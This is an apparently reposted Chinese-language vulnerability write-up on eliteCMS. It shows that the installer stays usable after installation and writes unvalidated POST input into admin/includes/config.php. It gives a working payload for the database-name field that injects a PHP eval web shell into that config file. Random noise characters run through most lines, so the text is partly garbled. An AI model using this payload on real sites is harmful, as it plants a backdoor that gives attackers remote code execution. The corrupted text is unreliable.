eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
7 B% B" f$ e8 Y- d* t7 R: B
# o' u* h+ ~. P, P1 t j另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php( Z( X5 Z, y' {) s) Q% N
我们来看代码:$ m. h& K* L& r2 u) @- t* O) I3 u# s
8 v5 c; t/ F4 G# V( A
...$ w! l, `& B% I& ^
elseif ($_GET['step'] == "4") {0 v* ^3 _# `4 u5 V, ~ z6 `/ L
$file = "../admin/includes/config.php";3 }8 h" Y3 |; K8 b( ]7 u, L1 B( h
$write = "<?php\n";
/ l, H+ z" U* F6 U3 G3 j $write .= "/**\n";+ l( s+ Q, i5 G
$write .= "*\n";
5 y& w! o3 H5 M9 j$ t$ D- O $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
5 Q+ I- U# s- v/ i...略...: i" B) `% ]+ M# r& Q$ C& R: X
$write .= "*\n";
9 h) ^% u+ U+ x $write .= "*/\n";
+ ]! h) N, }0 `7 @/ }, W: e7 z $write .= "\n";+ U, T& X1 d$ C& `5 a& B1 V! x' M" j
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";6 y+ h& p/ |: H
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";/ Z4 K* M8 T- E& l c9 b2 ~/ [' M
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
/ _1 ~5 V( m, H5 i2 F $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
1 {7 x2 U3 `( S, x/ K p3 H $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";/ F0 z0 R: n; l2 l$ v0 ?' l
$write .= "if (!\$connection) {\n";
& L+ m) ?" Z* @% j" p7 W $write .= " die(\"Database connection failed\" .mysql_error());\n";
, d( o2 I8 v$ s5 {0 a' V! H $write .= " \n";* i/ D5 v0 ~' U) Z
$write .= "} \n";& @% T( m- _6 s* ?2 ? A
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
6 o; t& o6 D* X4 M- a $write .= "if (!\$db_select) {\n";* z9 I7 W2 A$ z, Z* d s2 j0 v
$write .= " die(\"Database select failed\" .mysql_error());\n";' g, U, h- U! u. e+ u1 g. J$ Q
$write .= " \n";
# i. |5 m- E( W5 M; w $write .= "} \n";
' @$ v o: U/ ~/ k $write .= "?>\n";
! c% E$ A/ {# v' y" q9 e5 l' V 1 o9 q- \! R* t
$writer = fopen($file, 'w');
# I' d0 S) p4 R6 Q3 B...
0 |- @- W5 f& {2 |( [0 o
4 q/ j) L* e7 Y5 U6 `在看代码:
( }+ T7 y* L) p" d# H
( n& } d0 I: A# B$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];! i p* o7 v: z5 G
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
( \. ~* d$ \$ W; n& p* \6 f$_SESSION['DB_USER'] = $_POST['DB_USER'];
' I: L5 l) G, o+ t0 C$_SESSION['DB_PASS'] = $_POST['DB_PASS'];/ A h! g. P; k4 M0 y
: N% U$ h. r* P/ b. R8 K, @
取值未作任何验证# x! P" T; c3 p' ^" U- d- v
如果将数据库名POST数据:
1 \0 X% Z2 S& P/ a9 U5 D9 ?
! v0 Q7 d) z+ \2 h, C"?><?php eval($_POST[c]);?><?php
- r4 I7 H5 B7 X: R) d$ J6 v& }
- e" b& I4 j/ O) b4 g将导致一句话后门写入/admin/includes/config.php% l. N6 X, A2 k, p! D9 V
|